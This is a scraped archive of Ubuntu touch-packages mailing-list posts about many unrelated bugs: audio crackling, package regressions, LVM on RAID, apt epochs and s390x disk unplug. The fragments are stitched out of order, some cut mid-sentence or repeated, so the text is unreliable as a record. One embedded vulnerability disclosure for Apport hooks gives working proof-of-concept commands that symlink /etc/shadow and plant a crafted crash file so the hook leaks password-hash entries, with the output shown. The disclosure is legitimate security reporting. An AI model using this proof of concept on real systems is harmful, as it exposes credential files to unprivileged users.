[Touch-packages] [Bug 1931756] Re: [XPS 17 9700, Intel Kabylake HDMI, Digital Out, HDMI] Playback problem

2021-06-14 Thread pbea
Thank You.

My research suggests that the command journalctl -k is almost equivalent
to the old smesg so I have attached a copy.

I will still try to load your suggestion.

Bug description:
  in the package gnome-desktop3 there is a custom ubuntu patch that
  tries to write to the draw-background key that has now been removed in
  gsettings-desktop-schemas 40.0-1ubuntu1

  All packages that depend on the gnome-desktop3 library now crash such
  as budgie-desktop

  Suggestion - either re-add the patch again ... or revert the gnome-
  desktop3 custom patch.

  The latter option changes the symbols so probably I'm guessing a so-
  name version bump is needed and any dependent packages need a rebuild?

  I'll try to locally rebuild gnome-desktop3 without the custom ubuntu

[Touch-packages] [Bug 1931901] Re: Revert background key patch removal breaks dependent packages

2021-06-14 Thread fossfreedom
Just a follow-up - so recompiling budgie-desktop with a rebuilt gnome-
desktop3 bumped with a so-name of 20 stops budgie crashing. There are
other issues - but highly likely because a other packages need to be
rebuilt with the bumped so-name package version.

Enclosed a debdiff ( if the soname change is deemed the way forward

 In which Ubuntu release are you still seeing this problem?

Ubuntu 16.04 is now "End of Life" so will receive no further
updates. You should either upgrade to or install a supported
release.

See this document for currently supported Ubuntu releases:
https://wiki.ubuntu.com/Releases

If you are already running a later release please execute the
following command only once, as it will automatically gather
debugging information, in a terminal:

  apport-collect 1691608

When reporting bugs you should use apport by using 'ubuntu-bug'
and the name of the package affected. You can learn more about
this functionality at https://wiki.ubuntu.com/ReportingBugs.

  volume of the static will depend on the sound/music that is being
  played, and this only starts occurring after a somewhat long time (30
  minutes or more). What is interesting to see is that while playing
  back music from Spotify (Snap) the static will only start after a
  second or so, but when playing YouTube videos on Firefox, it will be
  immediate and output that static while the video is playing.

  I've added two sound recordings, one while playing back a song from
  Spotify and the other while playing a song from YouTube. This issue
  goes away when restarting the PulseAudio service, but it comes back
  after a random amount of time.

[Touch-packages] [Bug 1931902] Re: Crackling sound on Pulseaudio for Ubuntu 21.04

2021-06-14 Thread Matheus Reich
This is the static that can be heard while playing a song from YouTube
on Firefox. Notice that the crackling starts right away when pressing
play on the video, but it also has a delay to stop the static.

[Touch-packages] [Bug 1931902] Re: Crackling sound on Pulseaudio for Ubuntu 21.04

2021-06-14 Thread Matheus Reich
Also, I can add that I've only noticed this issue happening while using
DisplayPort, and playing back sound through my LG Monitor. This doesn't
happen when using a USB or Headphone jack headphone/headset. Also, I've
never noticed it happening when using an HDMI monitor, only DP. It could
be a bug with the display drivers, but I find it to be unlikely, given
that restarting PulseAudio fixes the issue temporarily, and then it
comes back.

[Touch-packages] [Bug 1931902] [NEW] Crackling sound on Pulseaudio for Ubuntu 21.04

2021-06-14 Thread Matheus Reich
Public bug reported:

While playing back any sounds, a certain crackling sound (static) will
play with a fixed delay of the sound being played. The amount and volume
of the static will depend on the sound/music that is being played, and
this only starts occurring after a somewhat long time (30 minutes or
more). What is interesting to see is that while playing back music from
Spotify (Snap) the static will only start after a second or so, but when
playing YouTube videos on Firefox, it will be immediate and output that
static while the video is playing.

I've added two sound recordings, one while playing back a song from
Spotify and the other while playing a song from YouTube. This issue goes
away when restarting the PulseAudio service, but it comes back after a
random amount of time.

[Touch-packages] [Bug 1931901] [NEW] Revert background key patch removal breaks dependent packages

2021-06-14 Thread fossfreedom
Public bug reported:

in the package gnome-desktop3 there is a custom ubuntu patch that tries
to write to the draw-background key that has now been removed in
gsettings-desktop-schemas 40.0-1ubuntu1

All packages that depend on the gnome-desktop3 library now crash such as
budgie-desktop

Suggestion - either re-add the patch again ... or revert the gnome-
desktop3 custom patch.

The latter option changes the symbols so probably I'm guessing a so-name
version bump is needed and any dependent packages need a rebuild?

I'll try to locally rebuild gnome-desktop3 without the custom ubuntu
patch to see what happens with budgie-desktop

Title:
  [SRU]Wrong keyboard layout active after booting into desktop

Status in ibus package in Ubuntu:

Status in ibus source package in Trusty:
  Fix Released

Bug description:
  [Impact]

  When first boot into Unity desktop, English keyboard layout is active
  while all other parts of the system language settings are set to
  another language (e.g. German).

  The bug is properly addressed in newer upstream releases in Vivid, but
  the changes is too intrusive and not suitable for being back ported in
  SRU. And changing the default to use system keyboard layout solves the
  problem.

  [Test Case]

  1. Set the system language to something other than English, e.g. German.
  2. Create a new user, log in to the Unity desktop of the new user.
  3. Check the keyboard layout, it should be German instead of English.

  [Regression Potential]

  Since this changes the default value of the keyboard layout settings
  by using system defined as default, it avoids using ibus's built-in
  keyboard layout related functionality, so that this could be a
  regression for users rely on this certain behavior (e.g. use English
  keyboard while want to keep the system language settings to German),
  but such behavior is not expected for normal usage.

Given the comments above from bdmurray and stgraber, and also the '[Test

'verification-done'.

[Touch-packages] [Bug 1691608] Re: Sporadic crackling sound from headphones

2021-06-14 Thread Paul White

[Touch-packages] [Bug 1918955] Re: SRU network: fix LXC_NET_NONE cleanup

2021-06-14 Thread Scott Moser
** Description changed:

  Hi. I'm using 20.04, and I need a fix for
  https://github.com/lxc/lxc/pull/3589

  I think my only options to get that via packaging are
   a.) https://launchpad.net/~ubuntu-lxc/+archive/ubuntu/lxc-git-master
   b.) build my own.

  I don't love either of those options.

  Can we please get a SRU update to 20.04 of an lxc with that fix?

  The fix is not in 4.0.5, so I marked this as affecting Groovy (currently
  1:4.0.4-0ubuntu3) without testing.

[Touch-packages] [Bug 1931612] Re: Print dialog box shows same printer twice

2021-06-14 Thread Timur Tabi
The GTK developers tell me that this is fixed in the latest version of
libgtk. How do I upgrade libgtk to the latest version on Ubuntu 20.04?
Is there a way I can pull in an update for just this package from a
newer version of Ubuntu, without breaking everything else?

  Print dialog box shows same printer twice

Status in cups package in Ubuntu:
  New

Bug description:
  I have set up a single HP printer which is attached to my network.
  The setup process went smoothly, and when I open the Printers system
  setup panel, I see only my printer there.

  However, when I print from an application, and that application uses
  the system print dialog box, my printer appears twice. One entry,
  matching the name correctly, works fine. The other, which a slightly
  changed name, does not work at all. See attached screenshot.

  Applications that have their own print dialog box do not have this
  problem. For example, Firefox shows only my printer once. Same thing
  with Libre Office.

  Description:Ubuntu 20.04.2 LTS
  Release:20.04

[Touch-packages] [Bug 1931874] [NEW] Failure to download packages with epochs (Regression from 2.1.15)

2021-06-14 Thread Julian Andres Klode
Public bug reported:

[Impact]
Packages where the epoch is encoded in the filename cannot be retrieved, as we
overlooked some places when changing the acquire system to always use % encoded
URLs.

[Test plan]
A test is included in the comprehensive test suite.

[Where problems could occur]
Regressions could occur in places that download debs with filenames that need
quoting or are already quoted. You can argue this also changes the API
slightly, since ArchiveURI() now returns encoded URLs, rather than just
appending the file path to the host. Although, this could actually improve
things too.

[Touch-packages] [Bug 1887372] Re: Cannot create lvm upon IMSM raid array

2021-06-14 Thread Jeff Lane
Mariusz,

> The following patches should fix the issue (not verified yet):
> https://sourceware.org/git/?p=lvm2.git;a=commit;h=23774f997ea077f2cbe8a32bd8bccdd7f4560cca

Were those patches verified to fix this in LVM2?

And is there an upstream release version that contains them?

** Changed in: lvm2 (Ubuntu Groovy)
   Status: Confirmed => Won't Fix

  Cannot create lvm upon IMSM raid array

  Confirmed
Status in lvm2 source package in Focal:
  Confirmed
Status in lvm2 source package in Groovy:
  Won't Fix
Status in lvm2 source package in Hirsute:
  Confirmed

Bug description:
  The issue has been observed on 2.3.7 (Ubuntu 20.04).
  Reported to lvm team:
  https://bugzilla.redhat.com/show_bug.cgi?id=1855251

  Steps to Reproduce:
  1. Create IMSM raid array:
  #mdadm -CR imsm -e imsm -n2 /dev/nvme[01]n1
  #mdadm -CR vol -l1 -n2 /dev/nvme[01]n1 -z 5G

  2. Create lvm volume on raid:
  # pvcreate -ff -y /dev/md/vol
  # vgcreate group0 /dev/md/vol
  # lvcreate -Z y -y -l +100%FREE group0 -n lvm0

  Actual results:
  Vg creation fails.

  Expected results:
  LVM should be able to determine the best drive and ignore duplicates.

  Additional info:
  IMSM metadata is written at the end of the drive. The first drive sector
belongs to the raid volume and other metadata saved there (like lvm) can be
recognized directly on raid members.

  The following patches should fix the issue (not verified yet):

https://sourceware.org/git/?p=lvm2.git;a=commit;h=23774f997ea077f2cbe8a32bd8bccdd7f4560cca

Bug description:
  # Vulnerabilities in Apport
  During a cursory code review, several potential security issues in `apport`
and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have
been identified.

  While the issue regarding the `openjdk-14-lts` package is exploitable
  on default installations, the remaining issues most likely are mitigated by
the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.

  With regard to issues mitigated by `fs.protected_symlinks`, it is not
  clear if they are considered to be part of the threat model, but
  nonetheless will be included in this report. Further, if the issues
  regarding package hooks should be reported in the corresponding
  packages' bug tracker, please let me know.

  ## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
  The `add_info()` function allows for a directory traversal by building a file
path using user-controlled data without properly sanitizing the resulting path.

  ```Python
  def add_info(report, ui=None):
  if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
  # attach hs_err_.pid file
  cwd = report['ProcCwd']
  pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
  if pid_line:
  pid = pid_line.groups()[0]
  path = "%s/hs_err_pid%s.log" % (cwd, pid)
  # make sure if exists
  if os.path.exists(path):
  content = read_file(path)
  # truncate if bigger than 100 KB
  # see LP: #1696814
  max_length = 100*1024
  if sys.getsizeof(content) < max_length:
  report['HotspotError'] = content
  report['Tags'] += ' openjdk-hs-err'
  else:
  report['HotspotError'] = content[:max_length] + \
  "\n[truncated by openjdk-11 apport hook]" + \
  "\n[max log size is %s, file size was %s]" % \
  (si_units(max_length),
si_units(sys.getsizeof(content)))
  report['Tags'] += ' openjdk-hs-err'
  ```

  By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as
  `0`, the function includes an arbitrary file by following a potential
  symbolic link `/home/user/hs_err_pid0.log`.

  ### PoC
  ```
  $ sudo apt install openjdk-14-jdk
  $ sudo sysctl fs.protected_symlinks
  fs.protected_symlinks = 1
  $ ln -s /etc/shadow /home/user/hs_err_pid0.log
  $ pid=$'\t0';cat << EOF > /var/crash/poc.crash
  ProblemType: Crash
  ExecutablePath: /poc
  Package: openjdk-lts 123
  SourcePackage: openjdk-lts
  ProcCwd: /home/user
  ProcStatus:
   Pid:$pid
   Uid:$pid
  EOF
  $ grep -A3 root: /var/crash/poc.crash
   root:!:18393:0:9:7:::
   daemon:*:18375:0:9:7:::
   bin:*:18375:0:9:7:::
   sys:*:18375:0:9:7:::
  ```

  ## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
  The root cause of this issue stems from the fact, that a potentially
  user-controlled file in the `/tmp` directory is not checked for being a
symbolic link and therefore might allow including arbitrary files in the
processed crash report:

  Note: Requires `fs.protected_symlinks=0`

  ```Python
  def attach_3d_info(report, ui=None):
  ...
  # Compiz internal state if compiz crashed
  if True or report.get('SourcePackage','Unknown') == "compiz" and
"ProcStatus" in report:
  compiz_pid = 0
  pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
  if pid_line:
  compiz_pid = pid_line.groups()[0]
  compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
  attach_file_if_exists(report, compiz_state_file,
"compiz_internal_states")
  ```

  ### PoC
  ```
  $ sudo sysctl fs.protected_symlinks=0
  fs.protected_symlinks = 0
  $ ln -s /etc/shadow /tmp/compiz_internal_state0
  $ cat << EOF > /var/crash/poc.crash
  ProblemType: Crash
  ExecutablePath: /poc
  Package: source_xorg 123
  SourcePackage: compiz
  Hot-unplug of disks leaves broken block devices around in Hirsute on
Bug description:
  SRU Justification
  [Impact]
  Hot removal of disks under kvm on s390 does not result in the kernel
  removing the block device, which can lead to hung tasks and other
  issues.
  [Test Plan]
  See steps to reproduce the bug in the original description below. To
  test, execute these steps and confirm that the block device gets
  removed as expected.
  [Where problems could occur]
  The fix is a revert of the changes which introduced this regression.
  The original commit was a removal of supposedly unused code, but it
  seems a mistake was made in the logic around unregistering of disks.
  Reverting the changes could have potential to introduce bugs related
  to other virt devices, especially if it interacts badly with
  subsequent driver changes. However, the patch reverted cleanly, and
  reverting restores the code to the state which has been working well
  in previous kernels and seems like the lowest risk option until a
  proper fix is available upstream.
  Repro:
  #1 Get a guest
  $ uvt-kvm create --disk 5  --password=ubuntu h release=hirsute arch=s390x
label=daily
  $ uvt-kvm wait h release=hirsute arch=s390x label=daily
  #2 Attach and Detach disk
  $ sudo qemu-img create -f qcow2 /var/lib/libvirt/images/test.qcow2 10M
  $ virsh attach-disk h /var/lib/libvirt/images/test.qcow2 vdc
  $ virsh detach-disk h vdc
  From libvirts POV it is gone at this point
  $ virsh domblklist h
   Target   Source
  --
   vda  /var/lib/uvtool/libvirt/images/hirsute-2nd-zfs.qcow
   vdb  /var/lib/uvtool/libvirt/images/hirsute-2nd-zfs-ds.qcow
  But the guest thinks still it is present
  $ uvt-kvm ssh --insecure hirsute-2nd-zfs lsblk
    ...
    vdc252:32   0   20M  0 disk
  This even remains a while after (not a race).
  Any access to it in the guest will hang (as you'd expect of a non-existing
blockdev)
  4 017581739  20   0  12140  4800 -  S+   pts/0  0:00  |
\_ mkfs.ext4 /dev/vdc
  The result above was originally found with hirsute-guest@hirsute-host
  on s390x
  I do NOT see the same with  groovy-guest@hirsute-host on s390x
  I DO see the same with hirsute-guest@groovy-host on s390x
    => Guest version dependent not Host/Hipervisor dependent
  I DO see the same with ZFS disks AND LVM disks being added
    => not type dependent
  I do NOT see the same on x86.
    => Arch dependent ??
  ... the evidence slowly points towards an issue in the guest, damn we are so
  close to release - but non-fully detaching disks are critical in my POV :-/
  Filing this as-is for awareness, but certainly this will need more debugging.
  Unsure where this is going to eventually I'll now file it for
kernel/udev/systemd.
  If there are any known issues/components that are related let me know please!
[Touch-packages] [Bug 1931609] Re: gstreamer1.0-plugins-bad compilation from sources: missing cuda.h
2021-06-14 Thread Adrian
As I don't need to compile gstreamer from source anymore, this bug doesn't
affect me anymore.
However, I think there is still an issue there. Using the latest Ubuntu docker
image one gets compilation errors.
Way to reproduce:
docker -it --rm ubuntu /bin/bash
In the container:
 sed -i '/deb-src/s/^# //' /etc/apt/sources.list && apt update
It sounds like the report are being submitted but did you actually go to
https://errors.ubuntu.com/user/ID as you wrote on comment #6? Because as
Daniel wrote in comment #3 'ID is the content of file /var/lib/whoopsie
/whoopsie-id on the machine', so the "ID" part of the URL should
actually be a number specific to your installation and leading to a page
showing your reports
2021-06-14 Thread Sebastien Bacher
Thank you for your bug report, could you give some details on what
'stops working' means exactly? When does it happen and what are you
doing at the time? Does it happen in the middle of playing a video for
example? Could you add the 'journalctl --b 0' log of the system after
getting the issue?
[Touch-packages] [Bug 1931834] Re: Bluetooth sound card not detected
2021-06-14 Thread Sebastien Bacher
Thank you for taking the time to report this bug and helping to make
Ubuntu better. Unfortunately, we cannot work on this bug because your
description didn't include enough information. You may find it helpful
to read "How to report bugs effectively"
http://www.chiark.greenend.org.uk/~sgtatham/bugs.html. We'd be grateful
if you would then provide a more complete description of the problem.
We have instructions on debugging some types of problems at
http://wiki.ubuntu.com/DebuggingProcedures.
At a minimum, we need:
1. The specific steps or actions you took that caused you to encounter the
problem.
2. The behavior you expected.
3. The behavior you actually encountered (in as much detail as possible).
Please also ensure that you include the release and flavour of Ubuntu
that you are using.
Thank you!
  In Lenovo P520, which using a codec for front panel, the other codec for rear
panel and both are on a same card.
  In this case, the rear Mic will present on input devices of "Sound
  Settings" even if attaching nothing to rear mic jack.
  [Fix]
  For alsa-ucm-conf part, the Mic 2 should use "Rear Mic Jack" as JackControl
because of
  ```
control.18 {
iface CARD
name 'Rear Mic Jack'
value true
comment {
access read
type BOOLEAN
count 1
}
}
  ```
  After applying "Rear Mic Jack", the rear Mic will not always there anymore
but it's not there as well if hot-plugging audio device on rear mic. Thus, it
needs to change pulseaudio to handle if all devices are off cases.
  For pulseaudio, if there is no any audio devices attached, then
  attaching an input device on rear mic jack. The port will not be
  selected automatically because the profiles is off. It needs patch
  pulseaudio to check off profiles (for dual codec case).
  [Test]
  After applying these patches, the rear mic jack works good in all cases (boot
without mic and then attach mic, boot with mic and then hotplug it) and other
functions (line-in / line-out) work pretty well.
  [Where problems could occur]
  This change only apply the bonus on below cases:
  ```
  if ((has_input_port && found_available_input_port && !has_output_port) ||
  (has_output_port && found_available_output_port && !has_input_port) ||
  (has_input_port && found_available_input_port && has_output_port &&
found_available_output_port))
  ```
  and these cases have been tested.
  If there are some complex codec design then it might cause problem but so far
we didn't see that.
[Touch-packages] [Bug 1903351] Re: ignore_eacces and ignore_erofs patches don't work properly
2021-06-14 Thread Łukasz Zemczak
Ok, this SRU has been accepted without a clear test case or regression
potential. I am a bit weary about releasing it in this state. I will
assume there were enough SRU eyes on this one to still consider it 'good
to go' even with this state of affairs - and I guess there has been some
solid verification done as well. I will conditionally release this, but
let's try to have a well defined SRU situation before accepting into
-proposed - there are exceptions, like when it's all clear and doesn't
need any explanation, but it feels a different case here.
[Touch-packages] [Bug 1925211] Re: Hot-unplug of disks leaves broken block devices around in Hirsute on s390x
2021-06-14 Thread Frank Heimes
To unblock the SRU process for this bug I'm updating the tag from
verification-needed-focal to verification-done-focal, however this
ticket does not affect focal and it was never marked as affecting focal
(see title and bug description), hence I think this tag should not have
occurred here.
Bug description:
  SRU Justification
  [Impact]
  Hot removal of disks under kvm on s390 does not result in the kernel
  removing the block device, which can lead to hung tasks and other
  issues.
  [Test Plan]
  See steps to reproduce the bug in the original description below. To
  test, execute these steps and confirm that the block device gets
  removed as expected.
  [Where problems could occur]
  The fix is a revert of the changes which introduced this regression.
  The original commit was a removal of supposedly unused code, but it
  seems a mistake was made in the logic around unregistering of disks.
  Reverting the changes could have potential to introduce bugs related
  to other virt devices, especially if it interacts badly with
  subsequent driver changes. However, the patch reverted cleanly, and
  reverting restores the code to the state which has been working well
  in previous kernels and seems like the lowest risk option until a
  proper fix is available upstream.
  Repro:
  #1 Get a guest
  $ uvt-kvm create --disk 5  --password=ubuntu h release=hirsute arch=s390x
label=daily
  $ uvt-kvm wait h release=hirsute arch=s390x label=daily
  #2 Attach and Detach disk
  $ sudo qemu-img create -f qcow2 /var/lib/libvirt/images/test.qcow2 10M
  $ virsh attach-disk h /var/lib/libvirt/images/test.qcow2 vdc
  $ virsh detach-disk h vdc
  From libvirts POV it is gone at this point
  $ virsh domblklist h
   Target   Source
  --
   vda  /var/lib/uvtool/libvirt/images/hirsute-2nd-zfs.qcow
   vdb  /var/lib/uvtool/libvirt/images/hirsute-2nd-zfs-ds.qcow
  But the guest thinks still it is present
  $ uvt-kvm ssh --insecure hirsute-2nd-zfs lsblk
    ...
    vdc252:32   0   20M  0 disk
  This even remains a while after (not a race).
  Any access to it in the guest will hang (as you'd expect of a non-existing
blockdev)
  4 017581739  20   0  12140  4800 -  S+   pts/0  0:00  |
\_ sudo mkfs.ext4 /dev/vdc
  4 017591758  20   0   6924  1044 -  D+   pts/0  0:00  |
\_ mkfs.ext4 /dev/vdc
  The result above was originally found with hirsute-guest@hirsute-host
  on s390x
  I do NOT see the same with  groovy-guest@hirsute-host on s390x
  I DO see the same with hirsute-guest@groovy-host on s390x
    => Guest version dependent not Host/Hipervisor dependent
  I DO see the same with ZFS disks AND LVM disks being added
    => not type dependent
  I do NOT see the same on x86.
    => Arch dependent ??
  ... the evidence slowly points towards an issue in the guest, damn we are so
  close to release - but non-fully detaching disks are critical in my POV :-/
  Filing this as-is for awareness, but certainly this will need more debugging.
  Unsure where this is going to eventually I'll now file it for
kernel/udev/systemd.
  If there are any known issues/components that are related let me know please!
